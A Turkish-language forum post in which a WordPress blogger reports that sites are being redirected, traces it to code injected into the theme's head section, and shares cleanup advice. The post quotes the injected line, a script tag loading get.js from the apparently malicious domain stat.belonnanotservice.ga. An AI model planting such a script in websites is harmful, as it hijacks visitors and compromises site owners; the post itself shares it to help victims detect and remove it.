Merhaba arkadaşlar,

Bloglarımın bir kısmı bu siteye yönleniyor wordpress sitelere kod gelmiş galiba. Başka bu sıkıntıyı yaşayan var mı arkadaşlar bu siteye yönleniyor belonnanotservice araştırınca nette 2 gün önce yazılmış ingilizce yazılar var yeni birşey sanırım. Eklentilerden mi geldi nasıl oldu anlamadım konu açayım dedim belki bugün yada yarın aynı sıkıntıyı yaşayan olursa faydamız olur birbirimize.

Edit-1: Eklentileri komple devre dışı bıraktım sorun devam ediyor site başka bir adrese yönleniyor. Eklentileri komple sildim sorun devam ediyor.
Edit-2: Default temaya geçtim sorun düzeldi. Ana temaya kod eklenmiş olmalı bulup temizleyeceğim.
Edit-3: Head kodlarına eklemişler aşağıdaki kodu sildim düzeldi.
Edit-4: Eğer wp admin panele girebiliyorsanız şanslısınız head kodları arasındaki aşağıdaki kodu silin düzelir siteniz sonra şifre değişikliği vb. güvenlik önlemlerinizi alın. Bir diğer versiyonu var site linkinizin geçtiği tüm kodları belonnat olan ile değiştirmiş son sağlam yedeğe döneceğim değiştirmekle bitmiyor çünkü maalesef imkansız gibi birşey.

<script type='text/javascript' src='https://stat.belonnanotservice.ga/get.js?v=2'></script>